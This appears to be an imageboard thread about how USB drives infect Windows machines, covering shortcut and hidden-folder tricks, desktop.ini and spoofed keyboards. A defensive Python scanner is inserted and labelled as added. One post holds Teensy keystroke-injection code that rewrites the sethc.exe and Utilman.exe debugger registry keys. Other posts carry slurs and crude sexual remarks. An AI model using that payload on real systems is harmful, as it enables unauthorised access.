Malware

Thread replies: 134
Thread images: 18

File: 1486383989534.jpg (115KB, 500x667px)
How does malware infect a Windows machine through a USB flash drive if you disable autorun?
>>
>>60142891
Them's child rearin' hips yew faggot. Learn to women.
>>
That's one hell of a body.
>>
>>60142863
How can you seriously like a shitty anime that's like 30 years old when we write two thousand seventeen. It's getting beyond stale. Can we outlaw manchildren somehow? The future of the white race depends on it.
>>
>>60142863
Loading icons for DLL files in Explorer required loading them and executing Init function. It was fixed since I do not know when.
>>
>>60142976
>Loading icons for DLL files in Explorer required loading them and executing Init function
So part of the malware needs to be a DLL file?
And does that mean to execute the malware you'd need to open the drive?
Wouldn't using another file explorer solve that?
>>
>>60143013
Yes.
Yes.
Most likely not because icon loading is often borrowed from Win32. Read last sentence of my previous post.
>>
>>60142958
You need to go back
>>
Also, you can fix this manually by disabling all DLL custom icons.
HKCR/dllfile/DefaultIcon should not contain % signs.
>>
>>60142863
>How does malware infect a Windows machine through a USB flash drive if you disable autorun?
Most people don't disable autorun. When you make malware, you're normally not making it to infect the 1% to 5% of the people who take proactive steps to be secure. You're targeting the 99% to 95% of people who don't.
The exception to this is if you're the CIA or some shit and targeting specific individuals or foreign government systems.
>>
>>60143039
I've read that, but I still find some infected USB flash drives.
Maybe they don't update then?
>>60143067
Nice.
>>60143084
>Most people don't disable autorun
That's true for XP/Vista/Win7, but from Win 8 it should be disabled by default.
>>
>>60142958
You clearly don't belong here.
>>
>>60142863
Someone out there came on this belly.
Literally how can I continue with my life, knowing this?
>>
>>60142863
cute boy~
>>
>>60143046
>>60143145
And I'd like to add to my previous post, that if you are so pathetic as to like Neon Genesis Evangelion in Anno Domini 2000 and fucking 17, then liking any of those positively retarded girls - Asuka or the blue headed one - is barely better than being a literal horsefucker. The only one which is *maybe* acceptable for a well-adjusted adult is that purple haired milf.
>>
>>60142863
The usb stick can pretend to be whatever device, or even multiple ones at the same time. Like a keyboard and mouse that automatically do a sequence of key presses and mouse clicks when plugged in.
>>
>>60143104
>Maybe they don't update then?
This and autorun and

that fucking malware which replaces folders with executables with same names and hides folders (with hidden attribute). After flash drive goes through one XP machine with nothing secure, it's enough to click any of those, even on 7 probably.
>>
>>60143297
This.
>>
>>60142863
Hand over the sauce now
>>
>>60143297
That's assuming the USB flash drive spoofs the HID ID, which is on firmware level.
And in that case the OS doesn't really matter at this point, unless you use an OS that doesn't support USB HID.
>>
If this is a girl then I'd fuck the shit out of her. If this is a boy then I'd fuck the shit out of him
>>
>>60143300
>malware which replaces folders with executables with same names and hides folders
That's clever, since many people don't enable "Show extension for known file types".
So if a machine has autorun disabled, and you've noticed the swap and didn't run the malware, you'd be safe?
I also assume the original folders won't be simply hidden, it might even have the system attribute added to it.
>>
>>60143171
wtf i am a faggot now
>>
>>60143614
>So if a machine has autorun disabled, and you've noticed the swap and didn't run the malware, you'd be safe?
Windows is a shitload of legacy code. You are never safe until proven so.
There was no indication of DLL icon vulnerability since almost all DLLs had same icons built in and nobody thought that windows could be calling DLL to get icon.
>I also assume the original folders won't be simply hidden,
Properties->Hidden
>>
>>60142863
Give me the salsa m80
>>
>>60143300
THIS.
I have an old XP machine that I use to control a waterjet cutter.
Many customers come in with USB flash drives infected with various malware.
However I discovered that Windows might have a new way to set the hidden attribute,
since the folder icon was changed to that of a volume, and it can't be unhidden.
I had to delete it.
>>
>>60142863
It doesn't.
>>
>>60143252
>Liking biological females is almost as bad as wanting to fuck a horse
Here's your (you).
>>
>>60144041
>Completely retarded moetron which indeed started the retard-moe trend 10 years before it became a thing
>Even more retarded obnoxious tsunderetron which started the obnoxious baka-baka-baka tsundere trend 10 years before it became a thing
>Also 2d anime characters
>biological females

(((((((((((((((((((((((((((((((((((Thats bait)))))))))))))))))))))))))))))))
>>
Don't post OP images that are more interesting than your topic
>>
File: ncY0gkH.jpg (114KB, 960x720px)
>fapping to male asuka
faggots go fap to kawaru
>>
>>60142863
p-please be a trap
>>
>>60142958
Kys my man
>>
>>60142863
Driver Hijack.

Autorun got replaced with redirects in early 2013.
>>
>>60145871
>redirects in early 2013
Example?
>>
>>60145898
>Infected PC creates shortcuts for all files, and makes a hidden folder with a blank filename that will store the original files and an executable file/installer
>Shortcuts open the malware installer disguised as the device drivers and the original file
>90% of people never notice their USB is infected
>>
>>60145964
I understood the first part but why device driver?
>>
>>60146030
So the malware can be executed without having to deal with UAC.
>>
>>60146050
I see, in that case the best way to protect yourself from that is to check file extensions and disable autorun?
>>
>>60146077
Pretty much.
You should be able to rescue the USB and get rid of the malware easily anyway; all you need are 2 commands.

It's common sense to always check what you are running.
>>
>>60146077
The best way to save yourself is to
install gentoo
You wouldn't go to sleep with your head inside a guillotine, would you?
>>
>>60146125
>2 commands
del and attrib ?
>>
>>60142863
>run Linux
>never need to worry about this shit
>>
>>60146542
Isn't linux susceptible to autorun virus? especially if you have WINE installed?
>>
>>60146928
Many distros auto mount flash drives but don't autorun
>>
>>60146959
What's the difference?
>>
>>60146972
Mounting just means it's accessible to the root filesystem for reading and writing
>>
>>60146999
So opening the mounted volume with explorer doesn't execute the malware even if you have WINE installed?
>>
>>60147038
It might
Wine definitely introduces vulnerabilities
>>
>>60142913
>what is potatoshop
>>
>>60145898
>>60145964
If I remember correctly all the files are hidden in a system permission folder with a filename that is the alt+0160/NBSP character, which looks like a space [ ] but is actually not the same. It won't delete files because that would trigger UAC. It just hides them and infects every shit it can.
Noobs are baited to click the dummy shortcut .lnk files which will:
open the malware and infect the local PC
open the shortcut to the folder or file so it won't be suspicious
The problem is when people try to copy/download that shortcut which isn't the actual file.

The malware sometimes just points to a native system32 command that will parse a binary that is hidden in the flash drive OR some garbled text file that is encoded to some shit to avoid detection.

Easy fix is to make a file with alt+0160 and give it a system permission so the virus wouldn't be able to hide your files (like the autorun.inf folder hacky fix)
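
Added example, not part of the thread and not any poster's code: a read-only scan of a mounted drive's top level for the layout described in the posts above (a blank/NBSP-named folder holding the originals plus an executable, .lnk files standing in for them, an executable named like a folder, an autorun.inf file). The indicator names and the sample layout are constructed for illustration; Windows hidden/system attributes are deliberately not checked, so the script also works when the drive is mounted on Linux.

```python
import tempfile
from pathlib import Path

EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs"}

def scan_drive(root):
    """Return sorted (indicator, name) findings for the top level of a mounted drive."""
    entries = list(Path(root).iterdir())
    dir_names = {e.name.lower() for e in entries if e.is_dir()}
    findings, moved = [], set()
    for e in entries:
        # Folder whose name is only whitespace, e.g. NBSP (U+00A0, typed as Alt+0160).
        if e.is_dir() and e.name.strip() == "":
            findings.append(("blank-named-folder", repr(e.name)))
            for child in e.iterdir():
                if child.suffix.lower() in EXEC_EXTS:
                    findings.append(("executable-in-blank-folder", child.name))
                else:
                    moved.add(child.name.lower())  # originals moved out of sight
    for e in entries:
        if not e.is_file():
            continue  # an autorun.inf *directory* (the "vaccine" trick) is not flagged
        ext = e.suffix.lower()
        if ext == ".lnk" and e.stem.lower() in moved:
            findings.append(("shortcut-replacing-original", e.name))
        elif ext in EXEC_EXTS and e.stem.lower() in dir_names:
            findings.append(("executable-named-like-folder", e.name))
        elif e.name.lower() == "autorun.inf":
            findings.append(("autorun-inf-file", e.name))
    return sorted(findings)

def build_sample_drive(root):
    """Constructed sample layout made of harmless empty files, not a real infection."""
    root = Path(root)
    blank = root / "\u00a0"
    blank.mkdir()
    (blank / "report.docx").touch()
    (blank / "Photos").mkdir()
    (blank / "installer.exe").touch()
    for name in ("report.docx.lnk", "Photos.lnk", "notes.txt", "autorun.inf", "Music.exe"):
        (root / name).touch()
    (root / "Music").mkdir()
    return root

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for indicator, name in scan_drive(build_sample_drive(tmp)):
            print(f"{indicator:32} {name}")
```

A hit means the drive should be inspected from a machine that will not open the shortcuts; the scan itself never opens or executes anything on the drive.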
>>
>>60147721
there's another one which utilizes desktop.ini
it would:
>read the icon
>that is actually a malware
>no user intervention/autorun required, infected the moment you plug it in
it's very rare virus though but really clever
>>
>>60142863
cute belly
>>
>>60147769
>desktop.ini
That's genius.
GNU/Linux utilizes .ini files as well, does that make it vulnerable?
>>
>>60143943
Same malware prevents showing hidden files in Explorer.
>>
>>60142863
Memes aside, is that a girl or a girl(female)?
>>
>>60142863
>people in this thread say its a guy

[spoiler] it only makes me harder [/spoiler]
>>
File: line_analysis.png (462KB, 500x667px)
>>60148291
Based on the hips and the accuracy of the photo, I would say this is a woman. Usually when the hips are gimped there's some level inaccuracy with the vertical lines. I've highlighted some key lines in gimp here to emphasize the correctness. The only concern here is a rather large, uniform white spot around the hip that could indicate error correction. It's still somewhat up in the air, but my vote is female.
>>
>>60149494
>no penis

Dropped
>>
>>60143524
Wow.

Could we stop USB HID software by presenting a prompt when a "keyboard" is plugged in? Like a captcha to prove you're real human bean, so that if it starts typing bullshit, the PC will know this nigga ain't a real keyboard.
>>
>>60142958
You should go to the Facebook Linux Memes group. You'd get along great over there.
>>
Again /g/ can't into the humans

It isn't that autorun is the most dangerous, but it is the easiest that retards can do to get files into a network. The user is going to run the malware they bring in. USB is a nice target since it avoids all email, firewall (read website filtering) and the false sense of security that it came from my machine at home.

inb4 you can do X. We are talking about users who can't common sense 2017
>>
>>60143252
off yourself my dude
>>
WHERES THE FUCKING SOURCE
>>
>>60142958
I feel sorry for your mother.
>>
File: hehe.jpg (29KB, 438x396px)
>>60142891
I'd ssh into her MySQL server if you know what I mean.
>>
>>60147499
something not done to this image
>>
>>60153898
you mean give her a hot SQL Injection?
>>
File: faggots.jpg (59KB, 1920x1080px)
>this thread
Remember when you didn't have to assume every womanlike figure was some kind of trap or freak? I hate this timeline. I want to go back.
>>
>>60142958
>>60143046
>>60143252
Back to Argentina with you
>>
>>60142863
same way that your pic is a trap
>>
Finally. I've been wondering how these shitty desktop.ini files were related to persistence. The flavour I've been dealing with uses bogus System Volume Information folders, too.
>>
WHO IS OP'S SEMEN DEMON
>>
File: 4e9.png (338KB, 600x417px)
>>60153416
>>60154195
>dont like my retard imaginary girlfriend
>written by infamous hack
Hideaki Anno
>GET OFF MY BOARD

>>/a/
>>/1990s/
>>
File: 1456207346948.jpg (56KB, 720x501px)
>>60143297
This anon gets it. I use a teensy sometimes on physical pen tests because they're so cheap.
 
#define TEENSY3
#ifdef TEENSY2
#include <usb_private.h>
#endif

#define REG_Sethc "cmd /c REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\sethc.exe\" /v Debugger /t REG_SZ /d \"\" /f"
#define REG_Utilman "cmd /c REG ADD \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\Utilman.exe\" /v Debugger /t REG_SZ /d \"\" /f"

void setup() {
    delay(3000);
    wait_for_drivers(2000);

    minimise_windows();
    delay(500);
    while (!cmd_admin(3, 500))
    {
        reset_windows_desktop(2000);
    }
    Keyboard.println(REG_Sethc);
    delay(3000);
    Keyboard.println(REG_Utilman);
    delay(2000);
    Keyboard.println("exit");
}

void loop() {
}

void wait_for_drivers(int sleep)
{
    bool CapsLockTrap = is_caps_on();
    while (CapsLockTrap == is_caps_on())
    {
        Keyboard.set_key1(KEY_CAPS_LOCK);
        Keyboard.send_now();
        delay(200);
        Keyboard.set_modifier(0);
        Keyboard.set_key1(0);
        Keyboard.send_now();
        delay(500);
        delay(sleep);
    }
}
>>
>>60142958
The fuck kind of argument is "like 30 years old"? Are you going to call Shakespeare a hack next?
>>
>>60148278
Other than those.
The hidden files/folder doesn't appear when plugging the infected flash drive into Linux.
>>
>>60143524
>OS that doesn't support USB HID
Like what?
>>
>>60151033
>common sense 2017
What do you recommend?
Hot gluing every USB port isn't an option, and sometimes you need to lend USB flash drive to someone.
>>
>>60154272
>desktop.ini files
I've opened one of these and there was only gibberish in there.
>System Volume Information folders
That and RECYCLE as well.
>>
>>60142863
Source of this Asuka pls
>>
>>60142958
HURR DURR Y U NO LIEK WAT I LIEK
>>
>>60143252
are you seriously calling people pathetic, and in the same post casting your vote on who you'd fuck from an anime?
>>
>>60142863
who is that
source please
>>
File: symbian.jpg (23KB, 800x600px)
>>60156240
Symbian.
>>
WHERE IS THE SAUCE?!
>>
>>60147769
>desktop.ini
I thought that affects folder appearance when you open that folder.
Autorun.inf does the icon change thing.
>>
>>60142863
Who is this woman
>>
>>60158426
It's a dude
>>
File: homer sabber.png (81KB, 600x600px)
>>60142863
Who is this Slime Slurper?
>>
File: serveimage.png (55KB, 320x224px)
>>60142863
Searching the image didn't give me results, OP. I beg for your source. Also is this a girl (female) or a girl (male)?
>>
>>60158436
Who is this dude?
>>
>>60158436
it's not a dude for fucks sakes, it's a beautiful woman
>>
>>60158766
It's ok if you think guys are beautiful.
There's nothing weird about that these days.
>>
>>60142863
Teensy + shell code payload
>>
>>60156257
Something like McAfee device control can lock down all the USBs. Have a process through IT if you really need to use a USB.
>>
>>60159143
>"Good afternoon, IT guy, I have this USB flash drive can you see if it's safe?"
>*show generous amount of cleavage as a motivation*
>3 hours later, the USB flash drive is missing the IT room smells like squid
>>
>>60159191
what can I say. I like putting USBs in my ass and rocketing them out so I can hear the "ting" as it hits the side toilet.
>>
>>60159191
>"male semen"
>>
>>60147769
https://guides.yoosecurity.com/permanently-remove-desktop-ini-trojan-virus-from-windows-7-vista-or-xp/
>>
keeping this thread up until source is provided or his gender is confirmed male
>>
>>60147499
>>>/lgbt/
The hips don't lie. That's a cute girl.
>>
>>60161976
There's like 4 different threads on 4 different boards looking for sauce.

It's unsauceable
>>
>>60161976
>post cute girl
>OMG PLS BE A GUYYYYY

What the fuck is wrong with you people
>>
>>60162992
Welcome to 4chan.
>>
>>60162507
>It's unsauceable
I don't care
Get your best men on it
I need this sauce, boss
>>
>>60159595
Does any other kind exist?
>>
>>60142976
>Loading icons for DLL files in Explorer required loading them and executing Init function
holy shit what? is this true?
>>
>>60162992
confirmation of guy, so i can stop thinking about it
>>
POST
MORE
ASUKA
>>
File: original.jpg (152KB, 720x960px)
>>60164299
OK
>>
>>60143145
Evangelion is for the weebs that want to pretend they are cult
>>
>>60143943
DO NOT CONNECT A FOREIGN USB TO YOUR CNC PC!!!!!!!!

Instead plug them to your design PC, which will usually have an antivirus and copy the file from there to your safe MACHINE_PC - DESIGN_PC ONLY USB

I'd fire any employee who's responsible for me having to rebuild a system image for not using a machine assigned USB. Period.
>>
File: Untitled.png (720KB, 500x667px)
>>60149494
You're putting too much work into it.
According to Error Level Analysis, the image is mostly undoctored, with the exception being that strawberry in the middle. The highlights around her hair indicate JPG compression.
>>
>>60165473
thank god, she's a wonder of nature
>>
>>60165473
MVP right here. Can't find sauce, but with this I can feel some closure
>>
S A U C E
A U C E
U C E
C E
E
>>
>>60143252
>expecting people to be well-adjusted on 4chan of all places
>>
>>60155480
Shakespeare IS a hack
>>
>>60168110
might as well, this place has been full of normalfags for years now
>>
File: sad Gaben.jpg (26KB, 401x253px)
>>60142863
>ywn fuck her porcelain white pussy
>>
>>60168169
Anon whyyy

NOOoooooooooooooooooooooooo
>>
>>60156240
headless server with no local login prompt
>>
>>60143297
what you're looking for is teensy usb, hak5 use teensy usb called rubber ducky, but bash bunny came out, and is an improvement to rubber ducky imo.
>>
File: hanging.png (156KB, 295x357px)
>>60168169
>>
>>60168169
It's probably brown.
>>
File: 1493143611302.jpg (127KB, 600x1266px)
>>60170494
I ktf senpai
>>
>>60143252
You're right my man.
Misato is the best.
>>
>>60142863
Fuck this shit man, she is unfindable. Spent way more time on this than any healthy person should.

Not Alexandra Gaier, not Lana Rain, not any number of dA/IG sloots. I thought I was a good internet detective but I have been defeated.
>>
>>60170648
in fact it seems she's only ever been posted in 4chan and other chans. The earliest posts date back to January 2017
>>
>100 replies
>still no source
/g/ is fucking dead
>>
>>60142863
Put a fake pdf on the USB that's secretly malware. They click on it and bam. You could also use a rubber ducky.
>>
>>60170685
I swear i've seen this image way before 2017
>>
>>60170759
There's no sauce. This is all a dream.